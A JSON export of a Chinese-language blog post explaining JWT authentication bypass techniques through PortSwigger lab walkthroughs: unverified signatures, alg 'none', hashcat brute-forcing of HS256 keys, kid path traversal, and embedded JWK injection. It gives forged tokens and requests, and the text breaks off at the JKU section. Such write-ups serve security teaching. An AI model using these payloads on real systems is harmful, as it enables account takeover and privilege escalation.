{"id":1448,"date":"2024-03-01T21:07:00","date_gmt":"2024-03-01T13:07:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1448"},"modified":"2025-06-09T14:03:19","modified_gmt":"2025-06-09T06:03:19","slug":"jwt-attack","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1448","title":{"rendered":"JWT Attack"},"content":{"rendered":"\n<p>JWT\u653b\u64ca\u662f\u70ba\u4e86\u9952\u904e\u7db2\u7ad9\u8eab\u4efd\u9a57\u8b49\uff0c\u653b\u64ca\u8005\u6703\u5411\u7db2\u7ad9\u767c\u9001\u4fee\u6539\u5f8c\u7684JWT\uff0c\u76ee\u6a19\u662f\u5192\u5145\u53e6\u4e00\u500b\u8eab\u4efd\u7684\u4f7f\u7528\u8005\u3002\u5982\u679c\u653b\u64ca\u8005\u80fd\u5920\u4f7f\u7528\u4efb\u610f\u503c\u5275\u5efa\u81ea\u5df1\u7684JWT\u6709\u6548\u4ee4\u724c\uff0c\u4ed6\u5011\u80fd\u5920\u5347\u7d1a\u81ea\u5df1\u7684\u6b0a\u9650\u6216\u5192\u5145\u5176\u4ed6\u7528\u6236\uff0c\u5b8c\u5168\u63a7\u5236\u4ed6\u5011\u7684\u5e33\u6236\u3002<\/p>\n\n\n\n<p>JWT\u5e38\u898b\u653b\u64ca\u624b\u6cd5\u6709\u4ee5\u4e0b\u5e7e\u7a2e\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7c3d\u540d\u672a\u9a57\u8b49<\/li>\n\n\n\n<li>JWT\u7121\u7c3d\u540d<\/li>\n\n\n\n<li>\u7206\u529b\u7834\u89e3\u5c0d\u7a31\u5f0f\u52a0\u5bc6\u7c3d\u540d<\/li>\n\n\n\n<li>\u7528kid\u9952\u904e\u5c0d\u7a31\u5f0f\u52a0\u5bc6\u7c3d\u540d<\/li>\n\n\n\n<li>\u7528JWK\u9952\u904e\u975e\u5c0d\u7a31\u5f0f\u52a0\u5bc6\u7c3d\u540d<\/li>\n\n\n\n<li>\u7528JKU\u9952\u904e\u975e\u5c0d\u7a31\u5f0f\u52a0\u5bc6\u7c3d\u540d<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<p>ps:<br>\u95dc\u65bcJWT\u7684\u4ecb\u7d39\u53ef\u53c3\u8003\u4ee5\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-wp-embed\"><div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"wp-embedded-content\" data-secret=\"2bJiT1booF\"><a href=\"https:\/\/systw.net\/note\/archives\/1452\">JWT<\/a><\/blockquote><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"JWT &#8212; \u725b\u7684\u5927\u8166\" src=\"https:\/\/systw.net\/note\/archives\/1452\/embed#?secret=tZ5Yxmwn1h#?secret=2bJiT1booF\" data-secret=\"2bJiT1booF\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe>\n<\/div><\/figure>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u7c3d\u540d\u672a\u9a57\u8b49<\/h2>\n\n\n\n<p>\u7db2\u7ad9\u6c92\u6709\u9a57\u8b49JWT\u7c3d\u540d\uff0c\u653b\u64ca\u8005\u53ef\u4ee5\u5c0dJWT\u5167\u5bb9\u4efb\u610f\u66f4\u6539<\/p>\n\n\n\n<p>\u8209\u4f8b\u5982\u4e0b\uff0c\u7576\u5b58\u53d6admin\u9801\u9762\u6642\uff0c\u8fd4\u56de\u53ea\u6709administrator\u5e33\u6236\u624d\u80fd\u4f7f\u7528<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>################ request ################ \nGET \/admin HTTP\/1.1\nHost: 0a36001b04ccef7bc0a7741d006c0066.web-security-academy.net\nCookie:session=eyJraWQiOiI0ZjY1MzkzNC0yMTM3LTQzNGItYjE0OC0yNzg4Y2Y0OGRlMWYiLCJhbGciOiJSUzI1NiJ9.<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NjU3ODQxNH0<\/mark>.Hp6sPpaIOCVwA34Eb2-h_pU2r6dUH_ZptjPt07uvKcF6z7PGUKWTV6ZQqXMoArudgF2E0WyAP0BYzoYZ1M4WVu4tUY3v_1Tnbf7-H_EqIDihcQ6KuxNaXNNPZw22GGvVgUdCsy3XgfZFH_LY5raFPpjavJ5aAOcqXG58zQlFYWcU5Kye2xB5AczvbDEDnpvQk00ygPBPSnXbV4JIk1jRJDM1suI5LN_tKn7LD_oBOwRGaJtreNekpV-8NXqbxzfjgVqAmHhQz6ZDxV-5LmiHT9yXVX7PdsUt5xhfrZYkTd_s8n6s0RvHvR1gwueVCplJqecZRRCkaAzwF9O1M9GwPw\nCache-Control: max-age=0\n...omit...\n\n################ response ################ \n...omit... only allow administrator ...omit...<\/code><\/pre>\n\n\n\n<p>\u4f7f\u7528JWT editor\u53ef\u4ee5\u767c\u73fe\uff0ctoken\u4e2d\u7684<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NjU3ODQxNH0<\/mark>\u7b49\u65bc\u4ee5\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>{\n    \"iss\": \"portswigger\",\n    \"sub\": \"wiener\",\n    \"exp\": 1656578414\n}<\/code><\/pre>\n\n\n\n<p>\u900f\u904eJWT editor\u5c07\u4e0a\u8ff0\u5167\u5bb9\u6539\u70baadministrator<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>{\n    \"iss\": \"portswigger\",\n    \"sub\": \"administrator\",\n    \"exp\": 1656578414\n}<\/code><\/pre>\n\n\n\n<p>\u6b64\u6642token\u88e1\u9019\u90e8\u4efd\u6703\u8b8a\u6210<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2NTY1Nzg0MTR9<\/mark><\/p>\n\n\n\n<p>\u9001\u51fa\u7de8\u8f2ftoken\u5f8c\u7684\u8acb\u6c42\uff0c\u53ef\u6210\u529f\u5b58\u53d6admin\u4ecb\u9762<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>################ request ################ \nGET \/admin HTTP\/1.1\nHost: 0a36001b04ccef7bc0a7741d006c0066.web-security-academy.net\nCookie: session=eyJraWQiOiI0ZjY1MzkzNC0yMTM3LTQzNGItYjE0OC0yNzg4Y2Y0OGRlMWYiLCJhbGciOiJSUzI1NiJ9.<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2NTY1Nzg0MTR9<\/mark>.Hp6sPpaIOCVwA34Eb2-h_pU2r6dUH_ZptjPt07uvKcF6z7PGUKWTV6ZQqXMoArudgF2E0WyAP0BYzoYZ1M4WVu4tUY3v_1Tnbf7-H_EqIDihcQ6KuxNaXNNPZw22GGvVgUdCsy3XgfZFH_LY5raFPpjavJ5aAOcqXG58zQlFYWcU5Kye2xB5AczvbDEDnpvQk00ygPBPSnXbV4JIk1jRJDM1suI5LN_tKn7LD_oBOwRGaJtreNekpV-8NXqbxzfjgVqAmHhQz6ZDxV-5LmiHT9yXVX7PdsUt5xhfrZYkTd_s8n6s0RvHvR1gwueVCplJqecZRRCkaAzwF9O1M9GwPw\nCache-Control: max-age=0\n...omit...\n\n################ response ################ \n...omit...\n&lt;section&gt;\n&lt;p&gt;User deleted successfully!&lt;\/p&gt;\n\t&lt;h1&gt;Users&lt;\/h1&gt;\n\t&lt;div&gt;\n\t&lt;span&gt;wiener - &lt;\/span&gt;\n\t&lt;a href=\"\/admin\/delete?username=wiener\"&gt;Delete&lt;\/a&gt;\n...omit...<\/code><\/pre>\n\n\n\n<p>Lab: JWT authentication bypass via unverified signature<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">JWT\u7121\u7c3d\u540d<\/h2>\n\n\n\n<p>\u7db2\u7ad9\u63a5\u53d7\u6c92\u6709\u7c3d\u540d\u7684JWT\uff0c\u56e0\u6b64\u53ef\u4ee5\u5c07alg\u6539\u70banone\uff0c\u4e00\u65e6JWT\u6c92\u6709\u7c3d\u540d\u6a5f\u5236\uff0c\u90a3\u5c31\u53ef\u4ee5\u4efb\u610f\u4fee\u6539<\/p>\n\n\n\n<p>\u8209\u4f8b\u4f86\u8aaa\uff0c\u60f3\u7528administrator\u8eab\u4efd\u5b58\u53d6\/my-account\u529f\u80fd\uff0c\u6240\u4ee5\u4e00\u6a23\u900f\u904eJWT editor\u5c07token\u4fee\u6539\u70baadministor\u3002\u4f46\u56e0\u70ba\u76ee\u6a19\u7db2\u7ad9\u6709\u6307\u5b9aalg\uff0c\u6240\u4ee5\u4efb\u4f55\u5167\u5bb9\u7684\u4fee\u6539\u90fd\u6703\u548c\u7c3d\u540d\u4e0d\u540c\uff0c\u5c0e\u81f4\u4fee\u6539\u5f8c\u7684JWT\u7121\u6cd5\u4f7f\u7528 <\/p>\n\n\n\n<p>\u7531\u65bc\u7db2\u7ad9\u63a5\u53d7\u6c92\u6709\u7c3d\u540d\u7684JWT\uff0c\u56e0\u6b64\u53ea\u8981\u628aalg\u6539\u6210none\u5373\u53ef\u628a\u7c3d\u540d\u53d6\u6d88\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############## header ##############\n{\n    \"kid\": \"4d65bce9-4436-44cf-8475-a297719c5281\",\n    \"alg\": \"<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">none<\/mark>\"\n}\n\n############## payload ##############\n{\n    \"iss\": \"portswigger\",\n    \"sub\": \"<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">administrator<\/mark>\",\n    \"exp\": 1656580618\n}<\/code><\/pre>\n\n\n\n<p>\u91cd\u88fdtoken\u5f8c\uff0c\u53ef\u4ee5\u767c\u73fe\u5c11\u4e86\u7c3d\u540d\u90a3\u6bb5\uff0c\u5c07\u6b64\u8acb\u6c42\u9001\u51fa\u5373\u53ef\u7528administrator\u8eab\u4efd\u8a2a\u554f\/my-account<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/my-account HTTP\/1.1\nHost: 0ab7006c03314ce7c0c42f88006d0081.web-security-academy.net\nCookie: session=eyJraWQiOiI0ZDY1YmNlOS00NDM2LTQ0Y2YtODQ3NS1hMjk3NzE5YzUyODEiLCJhbGciOiJub25lIn0.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2NTY1ODA2MTh9.<\/code><\/pre>\n\n\n\n<p>Lab: JWT authentication bypass via flawed signature verification<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7206\u529b\u7834\u89e3\u5c0d\u7a31\u5f0f\u52a0\u5bc6\u7c3d\u540d<\/h2>\n\n\n\n<p>\u67d0\u4e9b\u7c3d\u540d\u7b97\u6cd5\uff0c\u50cf\u662fHS256\uff08HMAC+SHA-256\uff09\uff0c\u53ef\u4ee5\u4f7f\u7528\u4efb\u610f\u5b57\u7b26\u4e32\u505a\u70ba\u5bc6\u9470\uff0c\u56e0\u6b64\u53ef\u4ee5\u900f\u904e\u7206\u529b\u5bc6\u78bc\u7834\u89e3\u5f97\u5230\u5bc6\u9470\uff0c\u4e26\u4f7f\u7528\u5bc6\u9470\u91cd\u7c3d\u540d<\/p>\n\n\n\n<p>\u8209\u4f8b\u5982\u4e0b\uff0c\u4ee5\u4e0b\u662f\u8a2a\u554f\u7db2\u7ad9\u7684JWT token\uff0c\u9700\u8981administrator\u8eab\u4efd\u624d\u80fd\u8a2a\u554f\uff0c\u800c\u4e14\u4f7f\u7528HS256\u7c3d\u540d <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>################ request ################\nGET \/admin HTTP\/1.1\nHost: 0aff00980379e949c0ec224a00f90071.web-security-academy.net\nCookie: session=eyJraWQiOiJkYjFiZWEzOS05MjQwLTRjYjItODQ0MS04NjZjMjIxZDFmODUiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NzYwNjgwNH0.faMYDNGlalEN2C5YD2NGaRejmOAIXj1GQ2priBVj3yE\n...omit...\n\n################ response ################ \n...omit...Admin interface only available if logged in as an administrator...omit...<\/code><\/pre>\n\n\n\n<p>\u6240\u4ee5\u76f4\u63a5\u6539\u6210adminstrator\u6c92\u6709\u7528\uff0c\u9084\u5fc5\u9808\u8981\u5f97\u5230\u7c3d\u540d\u7528\u7684secret key\uff0c\u5728\u91cd\u65b0\u6839\u64da\u4fee\u6539\u5167\u5bb9\u91cd\u65b0\u7c3d\u540d\u624d\u884c\uff0c\u6b65\u9a5f\u5982\u4e0b<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">step1\uff0c\u627e\u51fasecret key<\/h3>\n\n\n\n<p>\u5148\u6e96\u5099\u4e00\u7d44\u5bc6\u78bc\u6a94jwt.secrets.list\uff0c\u5167\u5bb9\u53ef\u4ee5\u53c3\u8003<a href=\"https:\/\/github.com\/wallarm\/jwt-secrets\/blob\/master\/jwt.secrets.list\" target=\"_blank\" rel=\"noopener\">https:\/\/github.com\/wallarm\/jwt-secrets\/blob\/master\/jwt.secrets.list<\/a><\/p>\n\n\n\n<p>\u7136\u5f8c\u900f\u904ehastcat\u5617\u8a66\u7206\u529b\u7834\u89e3\u76ee\u524dtoken<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>hashcat -a 0 -m 16500 eyJraWQiOiJkYjFiZWEzOS05MjQwLTRjYjItODQ0MS04NjZjMjIxZDFmODUiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NzYwNjgwNH0.faMYDNGlalEN2C5YD2NGaRejmOAIXj1GQ2priBVj3yE jwt.secrets.list<\/code><\/pre>\n\n\n\n<p>\u7834\u89e3\u5f8c\u6703\u767c\u73fesecret key\u70basecret1<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">step2\uff0c\u7522\u751fJWT key<\/h3>\n\n\n\n<p>\u5728<code><code>JWT editor keys<\/code><\/code>\u4e2d\u9078\u64c7<code>new symmetric key<\/code>, \u6309\u4e0b<code>generate<\/code>\u6703\u7522\u751f\u4ee5\u4e0b\u5167\u5bb9<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>{\n    \"kty\": \"oct\",\n    \"kid\": \"6e45657d-202e-4e74-a50d-0c8f785dc1cf\",\n    \"k\": \"qzlgHvHrjWoqNS_9Jd_1EQ\"\n}<\/code><\/pre>\n\n\n\n<p>\u5c07\u525b\u525b\u7684secret key\u4f7f\u7528base64\u7de8\u78bc\u5f97\u5230c2VjcmV0MQ==\uff0c\u7136\u5f8c\u8cbc\u4e0a\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>{\n    \"kty\": \"oct\",\n    \"kid\": \"6e45657d-202e-4e74-a50d-0c8f785dc1cf\",\n    \"k\": \"<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">c2VjcmV0MQ==<\/mark>\"\n}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">step3. \u5c0d\u4fee\u6539\u7684\u5167\u5bb9\u91cd\u7c3d\u540d<\/h3>\n\n\n\n<p>\u5728<code>JWT editor<\/code>\u5c07\u539f\u672c\u7684token\u5167\u5bb9\u6539\u70baadministrator\u5982\u4e0b <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>{\n    \"iss\": \"portswigger\",\n    \"sub\": \"<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">administrator<\/mark>\", \n    \"exp\": 1657606804\n}<\/code><\/pre>\n\n\n\n<p>\u63a5\u8457\u5728<code>JWT editor<\/code>\u4e2d\u9ede\u9078<code>sign<\/code>\uff0c\u7136\u5f8c\u9078\u64c7\u4ee5\u4e0b\u914d\u7f6e<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>signing key<\/code>: you generated in the JWT editor keys<\/li>\n\n\n\n<li><code>signing algorithm<\/code>: HS256<\/li>\n\n\n\n<li><code>header options<\/code>: don&#8217;t modify header<\/li>\n<\/ul>\n\n\n\n<p>\u5c31\u6703\u6839\u64datoken\u4fee\u6539\u7684\u5167\u5bb9\uff0c\u7522\u751f\u76f8\u5c0d\u61c9\u7684\u7c3d\u540d\uff0c\u4f7f\u7528\u9019\u5168\u65b0token\u5c31\u53ef\u4ee5\u7528administrator\u8eab\u4efd\u8a2a\u554fadmin\u529f\u80fd<\/p>\n\n\n\n<p>Lab: JWT authentication bypass via weak signing key<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7528kid\u9952\u904e\u5c0d\u7a31\u5f0f\u52a0\u5bc6\u7c3d\u540d<\/h2>\n\n\n\n<p>\u958b\u767c\u4eba\u54e1\u53ef\u80fd\u4f7f\u7528kid\u53c3\u6578\u4f86\u6307\u5411\u8cc7\u6599\u5eab\u4e2d\u7684\u7279\u5b9a\u689d\u76ee\u6216\u662f\u6a94\u6848\u540d\u7a31\uff0c\u5982\u679c\u6b64\u53c3\u6578\u4e5f\u5bb9\u6613\u53d7\u5230\u76ee\u9304\u904d\u6b77\u7684\u653b\u64ca\uff0c\u5247\u653b\u64ca\u8005\u53ef\u80fd\u6703\u5f37\u5236\u4f3a\u670d\u5668\u4f7f\u7528\u5176\u6a94\u6848\u7cfb\u7d71\u4e2d\u7684\u4efb\u610f\u6a94\u6848\u4f5c\u70ba\u9a57\u8b49\u91d1\u9470\u3002<\/p>\n\n\n\n<p>\u8209\u4f8b\u5982\u4e0b\uff0c\u76ee\u6a19\u7db2\u7ad9\u70ba\u4e86\u9a57\u8b49\u7c3d\u540d\uff0c\u4f7f\u7528JWT header\u4e2d\u7684kid\u53c3\u6578\uff0c\u5f9e\u5176\u6a94\u6848\u7cfb\u7d71\u4e2d\u53d6\u5f97\u76f8\u95dc\u91d1\u9470\uff0c\u56e0\u6b64\u653b\u64ca\u8005\u53ef\u4ee5\u900f\u904ekid\u81ea\u5df1\u7c3d\u540d<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">step1.\u7522\u751fJWT key<\/h3>\n\n\n\n<p>\u5728<code>JWT editor keys<\/code>\u4e2d\u9078\u64c7<code>new symmetric key<\/code>, \u6309\u4e0b<code>generate<\/code>\u6703\u7522\u751f\u4ee5\u4e0b\u5167\u5bb9 (\u4e0d\u9700\u8981\u9078\u64c7<code>key size<\/code>\u56e0\u70ba\u5b83\u6703\u81ea\u52d5\u66f4\u65b0)<\/p>\n\n\n\n<p>\u7136\u5f8c\u5c07k\u7684\u503c\u63db\u6210base64\u7de8\u78bc\u7684<code>null byte<\/code>\uff0c\u4e5f\u5c31\u662fAA==\uff0c\u5982\u4e0b\u3002\u63a5\u8457\u6309<code>OK<\/code>\u5132\u5b58<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>{\n    \"kty\": \"oct\",\n    \"kid\": \"41fc55b2-df7b-4063-9e7e-7f986a9f5fd9\",\n   <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"> \"k\": \"AA==\"<\/mark>\n}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">step2.\u7528null byte\u91cd\u65b0\u7c3d\u540d<\/h3>\n\n\n\n<p>\u5728<code>JWT editor<\/code>\u5c07\u539f\u672c\u7684token\u5167\u5bb9\u505a\u4fee\u6539<\/p>\n\n\n\n<p>kid\u8981\u6307\u5b9a\u5230\u4e00\u500b\u6703\u56de\u50b3null byte\u7684\u6a94\u6848\uff0c\u4f8b\u5982\/dev\/null\u3002\u7531\u65bc\u8a72\u7db2\u7ad9\u5b58\u5728directory traversal\u7684\u6f0f\u6d1e\uff0c\u56e0\u6b64\u4f7f\u7528\u6b64\u8def\u5f91<code>..\/..\/..\/..\/..\/..\/..\/dev\/null<\/code>\u5f97\u5230null byte<\/p>\n\n\n\n<p>sub\u6539\u70baadministrator\uff0c\u5982\u4e0b <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############## header ##############\n\n{\n    <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">\"kid\": \"..\/..\/..\/..\/..\/..\/..\/dev\/null\",<\/mark>\n    \"alg\": \"HS256\"\n}\n\n############## payload ############## \n\n{\n    \"iss\": \"portswigger\",\n    \"sub\": \"<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">administrator<\/mark>\",\n    \"exp\": 1658303137\n}\n<\/code><\/pre>\n\n\n\n<p>\u63a5\u8457\u5728<code>JWT editor<\/code>\u4e2d\u9ede\u9078<code>sign<\/code>\uff0c\u7136\u5f8c\u9078\u64c7\u525b\u525b\u5efa\u7acbsymmetric key\uff0c\u78ba\u4fdd<code>Don't modify header<\/code>\u9078\u9805\u88ab\u52fe\u9078\u5f8c\uff0c\u5c31\u6309\u4e0b\u78ba\u8a8d<code>OK<\/code><\/p>\n\n\n\n<p>\u6b64\u6642\u9019\u500btoken\u5df1\u7d93\u7528null byte\u7576\u505akey\u91cd\u65b0\u7c3d\u540d\uff0c\u4f7f\u7528\u9019\u5168\u65b0token\u5c31\u53ef\u4ee5\u7528administrator\u8eab\u4efd\u8a2a\u554f\u7db2\u7ad9<\/p>\n\n\n\n<p>Lab: JWT authentication bypass via kid header path traversal<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7528JWK\u9952\u904e\u975e\u5c0d\u7a31\u5f0f\u52a0\u5bc6\u7c3d\u540d<\/h2>\n\n\n\n<p>\u6b63\u5e38\u60c5\u6cc1\u4e0b\uff0c\u4f7f\u7528RSA\u7c3d\u540d\u7684\u7db2\u7ad9\u53ea\u80fd\u7528\u6307\u5b9a\u7684\u516c\u9470\u4f86\u9a57\u8b49JWT\u7c3d\u540d\uff0c\u4f46\u662f\u5982\u679c\u914d\u7f6e\u4e0d\u5c0d\uff0c\u53ef\u80fd\u53ef\u4f7f\u7528embeded JWK(JSON Web Key)\u3002\u9019\u8868\u793a\u7528\u6236\u53ef\u4ee5\u544a\u8a34\u7db2\u7ad9\u5728\u9a57\u8b49\u7c3d\u540d\u6642\u8981\u4f7f\u7528\u54ea\u4e00\u500bkey\uff0c\u7136\u5f8c\u4f7f\u7528\u81ea\u5df1\u7684\u4efb\u610fkey\u505a\u7c3d\u540d\u3002\u63db\u53e5\u8a71\u8aaa\uff0c\u53ef\u4ee5\u7528\u81ea\u5df1\u7684RSA\u79c1\u9470\u505a\u7c3d\u540d\uff0c\u7136\u5f8c\u628a\u5339\u914d\u7684RSA\u516c\u9470\u653e\u5165JWK header\u4e2d\u3002<\/p>\n\n\n\n<p>\u8209\u4f8b\u5982\u4e0b\uff0c\u76ee\u6a19\u7db2\u7ad9\u4f7f\u7528RSA\u7684\u65b9\u5f0f\u505a\u7c3d\u540d\uff0c\u70ba\u4e86\u8981\u6539\u7528\u81ea\u5df1\u7684RSA\u79c1\u9470\u7c3d\u540d\uff0c\u6b65\u9a5f\u5982\u4e0b<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">step1.\u7522\u751f\u81ea\u5df1\u7684RSA key pair<\/h3>\n\n\n\n<p>\u5230<code>JWT Editor Keys<\/code>\u9078\u64c7<code>New RSA Key<\/code>,\u6309\u4e0b<code>Generate<\/code>\u5f8c\u6703\u7522\u751f\u65b0\u7684key pair, \u6309<code>Ok<\/code>\u5f8c\u5132\u5b58\u9019RSA key (\u4e0d\u9700\u8981\u9078\u64c7<code>key size<\/code>\u56e0\u70ba\u5b83\u6703\u81ea\u52d5\u66f4\u65b0)<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">step2.\u4fee\u6539token\u5167\u5bb9 <\/h3>\n\n\n\n<p>\u7136\u5f8c\u56de\u5230<code>JWT editor<\/code>\u4e2d\uff0c\u5c07\u81ea\u5df1\u7684token\u6539\u70baadministrator\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########### header ##############\n\n{\n    \"kid\": \"cbb889d1-dc30-407a-b67d-1034114d1221\",\n    \"alg\": \"RS256\"\n}\n\n########### payload ##############\n\n{\n    \"iss\": \"portswigger\",\n    \"sub\": \"<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">administrator<\/mark>\",\n    \"exp\": 1659080691\n}\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">step3.\u7528\u81ea\u5df1RSA key pair\u7c3d\u540d<\/h3>\n\n\n\n<p>\u5728<code>JWT editor<\/code>\u4e0b\u9762\u6309<code>attack<\/code>\uff0c\u4e26\u9078\u64c7<code>Embedded JWK<\/code>\uff0c\u7136\u5f8c\u9078\u64c7\u525b\u525b\u7522\u751f\u7684RSA key\u4e26\u6309\u4e0b<code>OK<\/code> \uff0c\u5c31\u6703\u767c\u73feheader\u90e8\u4efd\u6709\u8b8a\u5316\uff0c\u4f8b\u5982\u4ee5\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########### header ##############\n{\n    \"kid\": \"477b1bbd-18ab-4774-b77c-989bf6037760\",\n    \"typ\": \"JWT\",\n    \"alg\": \"RS256\",\n    \"jwk\": {\n        \"kty\": \"RSA\",\n        \"e\": \"AQAB\",\n        \"kid\": \"477b1bbd-18ab-4774-b77c-989bf6037760\",\n        \"n\": \"jcep6jQV7CL_IUPGW1N4hZKjTmwTQc1V-o1zocuMliJ0NqPMzvmoglXPzraUbeiHUxOWM-JBRvTeuFOBQBi717vJD4Bf-5G248MDZXy8d94kRaFZzid9fLD2rDwJBFhNeFyulBIXpCpooTODNdXrs2eIlPwJL3f-TXOfy7uUftalRS4WPTUs-5NhhMqMBSr9LOyanpnScoNfi6wo2mzW-_K1ze45UHIBzb92kBnM0KOeMib027oRmcielyglL5yYbUrwabKqEvwm2EpI2fyPq9XwydkDABTnmrCtXf8oKpyQX_kYsWmGXa1SoSl-L7LRXqW64MNhAD4uBD7S4MZvGw\"\n    }\n}<\/code><\/pre>\n\n\n\n<p>\u6b64\u6642\u65b0\u7684token\u5c31\u53ef\u4ee5\u8996\u70baadministrator\u8a2a\u554fadmin<\/p>\n\n\n\n<p>lab:JWT authentication bypass via jwk header injection<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7528JKU\u9952\u904e\u975e\u5c0d\u7a31\u5f0f\u52a0\u5bc6\u7c3d\u540d<\/h2>\n\n\n\n<p>JWT\u4f7f\u7528RSA\u7c3d\u540d\u7684\u7db2\u7ad9\uff0c\u6709\u6642\u652f\u6301\u4f7f\u7528JKU(JWK Set URL) header \u53c3\u6578\u4f86\u5f15\u7528\u5bc6\u9470\u7684JWK set\uff0c\u7576\u8981\u9a57\u8b49JWT\u7c3d\u540d\u6642\u5c31\u6703\u6307\u5b9a\u7684URL\u7372\u53d6\u76f8\u95dckey\u3002\u4f46\u5728\u7372\u53d6key\u4e4b\u524d\uff0c\u7db2\u7ad9\u4e0d\u6703\u6aa2\u67e5\u9019\u4e9bURL\u662f\u5426\u5c6c\u65bc\u53d7\u4fe1\u4efb\u7684\u7db2\u5740\uff0c\u56e0\u6b64\u653b\u64ca\u8005\u53ef\u4ee5\u5229\u7528\u9019\u500b\u554f\u984c\u4f7f\u7528\u81ea\u5df1\u7684\u4efb\u610fkey\u505a\u7c3d\u540d\u3002\u6b65\u9a5f\u5982\u4e0b<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">step1.\u7522\u751f\u81ea\u5df1\u7684RSA key pair<\/h3>\n\n\n\n<p>\u5230<code>JWT Editor Keys<\/code>\u9078\u64c7<code>New RSA Key<\/code>,\u6309\u4e0b<code>Generate<\/code>\u5f8c\u6703\u7522\u751f\u65b0\u7684key pair, \u6309<code>Ok<\/code>\u5f8c\u5132\u5b58\u9019RSA key (\u4e0d\u9700\u8981\u9078\u64c7<code>key size<\/code>\u56e0\u70ba\u5b83\u6703\u81ea\u52d5\u66f4\u65b0)<\/p>\n\n\n\n<h3 